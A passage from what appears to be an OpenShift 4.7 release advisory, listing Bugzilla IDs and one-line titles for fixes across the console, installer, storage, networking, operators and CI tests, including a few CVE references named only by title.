resource 1906121 - [oc] After new-project creation, the kubeconfig file does not set the project 1906134 - OLM should not create OperatorConditions for copied CSVs 1906143 - CBO supports log levels 1906186 - i18n: Translators are not able to translate `this` without context for alert manager config 1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots 1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. 1906276 - `oc image append` can't work with multi-arch image with --filter-by-os='.*' 1906318 - use proper term for Authorized SSH Keys 1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional 1906356 - Unify Clone PVC boot source flow with URL/Container boot source 1906397 - IPA has incorrect kernel command line arguments 1906441 - HorizontalNav and NavBar have invalid keys 1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log 1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project 1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them 1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures 1906511 - Root reprovisioning tests flaking often in CI 1906517 - Validation is not robust enough and may prevent to generate install-confing. 1906518 - Update snapshot API CRDs to v1 1906519 - Update LSO CRDs to use v1 1906570 - Number of disruptions caused by reboots on a cluster cannot be measured 1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope 1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs 1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs 1906679 - quick start panel styles are not loaded 1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber 1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form 1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created 1906689 - user can pin to nav configmaps and secrets multiple times 1906691 - Add doc which describes disabling helm chart repository 1906713 - Quick starts not accesible for a developer user 1906718 - helm chart "provided by Redhat" is misspelled 1906732 - Machine API proxy support should be tested 1906745 - Update Helm endpoints to use Helm 3.4.x 1906760 - performance issues with topology constantly re-rendering 1906766 - localized `Autoscaled` & `Autoscaling` pod texts overlap with the pod ring 1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section 1906769 - topology fails to load with non-kubeadmin user 1906770 - shortcuts on mobiles view occupies a lot of space 1906798 - Dev catalog customization doesn't update console-config ConfigMap 1906806 - Allow installing extra packages in ironic container images 1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer 1906835 - Topology view shows add page before then showing full project workloads 1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version 1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy 1906860 - Bump kube dependencies to v1.20 for Net Edge components 1906864 - Quick Starts Tour: Need to adjust vertical spacing 1906866 - Translations of Sample-Utils 1906871 - White screen when sort by name in monitoring alerts page 1906872 - Pipeline Tech Preview Badge Alignment 1906875 - Provide an option to force backup even when API is not available. 1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities 1906879 - Add missing i18n keys 1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install 1906896 - No Alerts causes odd empty Table (Need no content message) 1906898 - Missing User RoleBindings in the Project Access Web UI 1906899 - Quick Start - Highlight Bounding Box Issue 1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1 1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers 1906935 - Delete resources when Provisioning CR is deleted 1906968 - Must-gather should support collecting kubernetes-nmstate resources 1906986 - Ensure failed pod adds are retried even if the pod object doesn't change 1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt 1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change 1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible. 1907269 - Tooltips data are different when checking stack or not checking stack for the same time 1907280 - Install tour of OCS not available. 1907282 - Topology page breaks with white screen 1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance 1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent 1907293 - Increase timeouts in e2e tests 1907295 - Gherkin script for improve management for helm 1907299 - Advanced Subscription Badge for KMS and Arbiter not present 1907303 - Align VM template list items by baseline 1907304 - Use PF styles for selected template card in VM Wizard 1907305 - Drop 'ISO' from CDROM boot source message 1907307 - Support and provider labels should be passed on between templates and sources 1907310 - Pin action should be renamed to favorite 1907312 - VM Template source popover is missing info about added date 1907313 - ClusterOperator objects cannot be overriden with cvo-overrides 1907328 - iproute-tc package is missing in ovn-kube image 1907329 - CLUSTER_PROFILE env. variable is not used by the CVO 1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached" 1907373 - Rebase to kube 1.20.0 1907375 - Bump to latest available 1.20.x k8s - workloads team 1907378 - Gather netnamespaces networking info 1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity 1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one 1907390 - prometheus-adapter: panic after k8s 1.20 bump 1907399 - build log icon link on topology nodes cause app to reload 1907407 - Buildah version not accessible 1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer" 1907453 - Dev Perspective -> running vm details -> resources -> no data 1907454 - Install PodConnectivityCheck CRD with CNO 1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources 1907475 - Unable to estimate the error rate of ingress across the connected fleet 1907480 - `Active alerts` section throwing forbidden error for users. 1907518 - Kamelets/Eventsource should be shown to user if they have create access 1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US 1907610 - Update kubernetes deps to 1.20 1907612 - Update kubernetes deps to 1.20 1907621 - openshift/installer: bump cluster-api-provider-kubevirt version 1907628 - Installer does not set primary subnet consistently 1907632 - Operator Registry should update its kubernetes dependencies to 1.20 1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters 1907644 - fix up handling of non-critical annotations on daemonsets/deployments 1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?) 1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication 1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail 1907767 - [e2e][automation]update test suite for kubevirt plugin 1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot 1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade 1907793 - Surface support info in VM template details 1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage 1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set 1907863 - Quickstarts status not updating when starting the tour 1907872 - dual stack with an ipv6 network fails on bootstrap phase 1907874 - QE - Design Gherkin Scenarios for epic ODC-5057 1907875 - No response when try to expand pvc with an invalid size 1907876 - Refactoring record package to make gatherer configurable 1907877 - QE - Automation- pipelines builder scripts 1907883 - Fix Pipleine creation without namespace issue 1907888 - Fix pipeline list page loader 1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form 1907892 - Unable to edit application deployed using "From Devfile" option 1907893 - navSortUtils.spec.ts unit test failure 1907896 - When a workload is added, Topology does not place the new items well 1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template 1907924 - Enable madvdontneed in OpenShift Images 1907929 - Enable madvdontneed in OpenShift System Components Part 2 1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot 1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context 1907948 - OCM-O bump to k8s 1.20 1907952 - bump to k8s 1.20 1907972 - Update OCM link to open Insights tab 1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI 1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916 1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni 1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk 1908035 - dynamic-demo-plugin build does not generate dist directory 1908135 - quick search modal is not centered over topology 1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled 1908159 - [AWS C2S] MCO fails to sync cloud config 1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384) 1908180 - Add source for template is stucking in preparing pvc 1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens 1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN 1908277 - QE - Automation- pipelines actions scripts 1908280 - Documentation describing `ignore-volume-az` is incorrect 1908296 - Fix pipeline builder form yaml switcher validation issue 1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI 1908323 - Create button missing for PLR in the search page 1908342 - The new pv_collector_total_pv_count is not reported via telemetry 1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name 1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots 1908349 - Volume snapshot tests are failing after 1.20 rebase 1908353 - QE - Automation- pipelines runs scripts 1908361 - bump to k8s 1.20 1908367 - QE - Automation- pipelines triggers scripts 1908370 - QE - Automation- pipelines secrets scripts 1908375 - QE - Automation- pipelines workspaces scripts 1908381 - Go Dependency Fixes for Devfile Lib 1908389 - Loadbalancer Sync failing on Azure 1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived 1908407 - Backport Upstream 95269 to fix potential crash in kubelet 1908410 - Exclude Yarn from VSCode search 1908425 - Create Role Binding form subject type and name are undefined when All Project is selected 1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods 1908434 - Remove &apos from metal3-plugin internationalized strings 1908437 - Operator backed with no icon has no badge associated with the CSV tag 1908459 - bump to k8s 1.20 1908461 - Add bugzilla component to OWNERS file 1908462 - RHCOS 4.6 ostree removed dhclient 1908466 - CAPO AZ Screening/Validating 1908467 - Zoom in and zoom out in topology package should be sentence case 1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size 1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster 1908471 - OLM should bump k8s dependencies to 1.20 1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests 1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1908545 - VM clone dialog does not open 1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard 1908562 - Pod readiness is not being observed in real world cases 1908565 - [4.6] Cannot filter the platform/arch of the index image 1908573 - Align the style of flavor 1908583 - bootstrap does not run on additional networks if configured for master in install-config 1908596 - Race condition on operator installation 1908598 - Persistent Dashboard shows events for all provisioners 1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state 1908648 - Skip TestKernelType test on OKD, adjust TestExtensions 1908650 - The title of customize wizard is inconsistent 1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator 1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s] 1908687 - Option to save user settings separate when using local bridge (affects console developers only) 1908697 - Show `kubectl diff ` command in the oc diff help page 1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom 1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds 1908717 - "missing unit character in duration" error in some network dashboards 1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload 1908747 - stale S3 CredentialsRequest in CCO manifest 1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase 1908830 - RHCOS 4.6 - Missing Initiatorname 1908868 - Update empty state message for EventSources and Channels tab 1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1908888 - Dualstack does not work with multiple gateways 1908889 - Bump CNO to k8s 1.20 1908891 - TestDNSForwarding DNS operator e2e test is failing frequently 1908914 - CNO: upgrade nodes before masters 1908918 - Pipeline builder yaml view sidebar is not responsive 1908960 - QE - Design Gherkin Scenarios 1908971 - Gherkin Script for pipeline debt 4.7 1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated 1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console 1908998 - [cinder-csi-driver] doesn't detect the credentials change 1909004 - "No datapoints found" for RHEL node's filesystem graph 1909005 - i18n: workloads list view heading is not translated 1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects 1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type 1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware 1909067 - Web terminal should keep latest output when connection closes 1909070 - PLR and TR Logs component is not streaming as fast as tkn 1909092 - Error Message should not confuse user on Channel form 1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page 1909108 - Machine API components should use 1.20 dependencies 1909116 - Catalog Sort Items dropdown is not aligned on Firefox 1909198 - Move Sink action option is not working 1909207 - Accessibility Issue on monitoring page 1909236 - Remove pinned icon overlap on resource name 1909249 - Intermittent packet drop from pod to pod 1909276 - Accessibility Issue on create project modal 1909289 - oc debug of an init container no longer works 1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2 1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle 1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it 1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O 1909464 - Build operator-registry with golang-1.15 1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found 1909521 - Add kubevirt cluster type for e2e-test workflow 1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created 1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node 1909610 - Fix available capacity when no storage class selected 1909678 - scale up / down buttons available on pod details side panel 1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined 1909739 - Arbiter request data changes 1909744 - cluster-api-provider-openstack: Bump gophercloud 1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline 1909791 - Update standalone kube-proxy config for EndpointSlice 1909792 - Empty states for some details page subcomponents are not i18ned 1909815 - Perspective switcher is only half-i18ned 1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body 1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI 1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing 1909911 - [OVN]EgressFirewall caused a segfault 1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument 1909958 - Support Quick Start Highlights Properly 1909978 - ignore-volume-az = yes not working on standard storageClass 1909981 - Improve statement in template select step 1909992 - Fail to pull the bundle image when using the private index image 1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev 1910036 - QE - Design Gherkin Scenarios ODC-4504 1910049 - UPI: ansible-galaxy is not supported 1910127 - [UPI on oVirt]: Improve UPI Documentation 1910140 - fix the api dashboard with changes in upstream kube 1.20 1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable 1910165 - DHCP to static lease script doesn't handle multiple addresses 1910305 - [Descheduler] - The minKubeVersion should be 1.20.0 1910409 - Notification drawer is not localized for i18n 1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials 1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation 1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page 1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work 1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready 1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability 1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded 1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected" 1910753 - Support Directory Path to Devfile 1910805 - Missing translation for Pipeline status and breadcrumb text 1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer 1910840 - Show Nonexistent command info in the `oc rollback -h` help page 1910859 - breadcrumbs doesn't use last namespace 1910866 - Unify templates string 1910870 - Unify template dropdown action 1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6 1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads" 1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard 1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration" 1911213 - Wrong and misleading warning for VMs that were created manually (not from template) 1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created 1911269 - waiting for the build message present when build exists 1911280 - Builder images are not detected for Dotnet, Httpd, NGINX 1911307 - Pod Scale-up requires extra privileges in OpenShift web-console 1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template 1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error 1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template 1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation 1911418 - [v2v] The target storage class name is not displayed if default storage class is used 1911434 - git ops empty state page displays icon with watermark 1911443 - SSH Cretifiaction field should be validated 1911465 - IOPS display wrong unit 1911474 - Devfile Application Group Does Not Delete Cleanly (errors) 1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController 1911574 - Expose volume mode on Upload Data form 1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined 1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel 1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle'' 1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state 1911782 - Descheduler should not evict pod used local storage by the PVC 1911796 - uploading flow being displayed before submitting the form 1912066 - The ansible type operator's manager container is not stable when managing the CR 1912077 - helm operator's default rbac forbidden 1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory' 1912237 - Rebase CSI sidecars for 4.7 1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page 1912409 - Fix flow schema deployment 1912434 - Update guided tour modal title 1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken 1912523 - Standalone pod status not updating in topology graph 1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion 1912558 - TaskRun list and detail screen doesn't show Pending status 1912563 - p&f: carry 97206: clean up executing request on panic 1912565 - OLM macOS local build broken by moby/term dependency 1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion 1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff 1912590 - publicImageRepository not being populated 1912640 - Go operator's controller pods is forbidden 1912701 - Handle dual-stack configuration for NIC IP 1912703 - multiple queries can't be plotted in the same graph under some conditons 1912730 - Operator backed: In-context should support visual connector if SBO is not installed 1912828 - Align High Performance VMs with High Performance in RHV-UI 1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates 1912852 - VM from wizard - available VM templates - "storage" field is "0 B" 1912888 - recycler template should be moved to KCM operator 1912907 - Helm chart repository index can contain unresolvable relative URL's 1912916 - Set external traffic policy to cluster for IBM platform 1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller 1912938 - Update confirmation modal for quick starts 1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment 1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment 1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver 1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912977 - rebase upstream static-provisioner 1913006 - Remove etcd v2 specific alerts with etcd_http* metrics 1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip 1913037 - update static-provisioner base image 1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state 1913085 - Regression OLM uses scoped client for CRD installation 1913096 - backport: cadvisor machine metrics are missing in k8s 1.19 1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually 1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root 1913196 - Guided Tour doesn't handle resizing of browser 1913209 - Support modal should be shown for community supported templates 1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort 1913249 - update info alert this template is not aditable 1913285 - VM list empty state should link to virtualization quick starts 1913289 - Rebase AWS EBS CSI driver for 4.7 1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled 1913297 - Remove restriction of taints for arbiter node 1913306 - unnecessary scroll bar is present on quick starts panel 1913325 - 1.20 rebase for openshift-apiserver 1913331 - Import from git: Fails to detect Java builder 1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used 1913343 - (release-4.7) Added changelog file for insights-operator 1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator 1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en." 1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads 1913420 - Time duration setting of resources is not being displayed 1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\" 1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase 1913560 - Normal user cannot load template on the new wizard 1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user 1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table 1913568 - Normal user cannot create template 1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker 1913585 - Topology descriptive text fixes 1913608 - Table data contains data value None after change time range in graph and change back 1913651 - Improved Red Hat image and crashlooping OpenShift pod collection 1913660 - Change location and text of Pipeline edit flow alert 1913685 - OS field not disabled when creating a VM from a template 1913716 - Include additional use of existing libraries 1913725 - Refactor Insights Operator Plugin states 1913736 - Regression: fails to deploy computes when using root volumes 1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes 1913751 - add third-party network plugin test suite to openshift-tests 1913783 - QE-To fix the merging pr issue, commenting the afterEach() block 1913807 - Template support badge should not be shown for community supported templates 1913821 - Need definitive steps about uninstalling descheduler operator 1913851 - Cluster Tasks are not sorted in pipeline builder 1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists 1913951 - Update the Devfile Sample Repo to an Official Repo Host 1913960 - Cluster Autoscaler should use 1.20 dependencies 1913969 - Field dependency descriptor can sometimes cause an exception 1914060 - Disk created from 'Import via Registry' cannot be used as boot disk 1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy 1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks) 1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances 1914125 - Still using /dev/vde as default device path when create localvolume 1914183 - Empty NAD page is missing link to quickstarts 1914196 - target port in `from dockerfile` flow does nothing 1914204 - Creating VM from dev perspective may fail with template not found error 1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets 1914212 - [e2e][automation] Add test to validate bootable disk souce 1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes 1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows 1914287 - Bring back selfLink 1914301 - User VM Template source should show the same provider as template itself 1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs 1914309 - /terminal page when WTO not installed shows nonsensical error 1914334 - order of getting started samples is arbitrary 1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x 1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI 1914405 - Quick search modal should be opened when coming back from a selection 1914407 - Its not clear that node-ca is running as non-root 1914427 - Count of pods on the dashboard is incorrect 1914439 - Typo in SRIOV port create command example 1914451 - cluster-storage-operator pod running as root 1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true 1914642 - Customize Wizard Storage tab does not pass validation 1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling 1914793 - device names should not be translated 1914894 - Warn about using non-groupified api version 1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug 1914932 - Put correct resource name in relatedObjects 1914938 - PVC disk is not shown on customization wizard general tab 1914941 - VM Template rootdisk is not deleted after fetching default disk bus 1914975 - Collect logs from openshift-sdn namespace 1915003 - No estimate of average node readiness during lifetime of a cluster 1915027 - fix MCS blocking iptables rules 1915041 - s3:ListMultipartUploadParts is relied on implicitly 1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons 1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours 1915085 - Pods created and rapidly terminated get stuck 1915114 - [aws-c2s] worker machines are not create during install 1915133 - Missing default pinned nav items in dev perspective 1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource 1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot 1915188 - Remove HostSubnet anonymization 1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment 1915217 - OKD payloads expect to be signed with production keys 1915220 - Remove dropdown workaround for user settings 1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure 1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod 1915277 - [e2e][automation]fix cdi upload form test 1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout 1915304 - Updating scheduling component builder & base images to be consistent with ART 1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node 1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection 1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod 1915357 - Dev Catalog doesn't load anything if virtualization operator is installed 1915379 - New template wizard should require provider and make support input a dropdown type 1915408 - Failure in operator-registry kind e2e test 1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation 1915460 - Cluster name size might affect installations 1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance 1915540 - Silent 4.7 RHCOS install failure on ppc64le 1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI) 1915582 - p&f: carry upstream pr 97860 1915594 - [e2e][automation] Improve test for disk validation 1915617 - Bump bootimage for various fixes 1915624 - "Please fill in the following field: Template provider" blocks customize wizard 1915627 - Translate Guided Tour text. 1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error 1915647 - Intermittent White screen when the connector dragged to revision 1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased 1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found" 1915661 - Can't run the 'oc adm prune' command in a pod 1915672 - Kuryr doesn't work with selfLink disabled. 1915674 - Golden image PVC creation - storage size should be taken from the template 1915685 - Message for not supported template is not clear enough 1915760 - Need to increase timeout to wait rhel worker get ready 1915793 - quick starts panel syncs incorrectly across browser windows 1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster 1915818 - vsphere-problem-detector: use "_totals" in metrics 1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol 1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version 1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0 1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics 1915885 - Kuryr doesn't support workers running on multiple subnets 1915898 - TaskRun log output shows "undefined" in streaming 1915907 - test/cmd/builds.sh uses docker.io 1915912 - sig-storage-csi-snapshotter image not available 1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard 1915939 - Resizing the browser window removes Web Terminal Icon 1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance] 1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7 1915962 - ROKS: manifest with machine health check fails to apply in 4.7 1915972 - Global configuration breadcrumbs do not work as expected 1915981 - Install ethtool and conntrack in container for debugging 1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception 1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups 1916021 - OLM enters infinite loop if Pending CSV replaces itself 1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry 1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations 1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk 1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration 1916145 - Explicitly set minimum versions of python libraries 1916164 - Update csi-driver-nfs builder & base images to be consistent with ART 1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7 1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third 1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2 1916379 - error metrics from vsphere-problem-detector should be gauge 1916382 - Can't create ext4 filesystems with Ignition 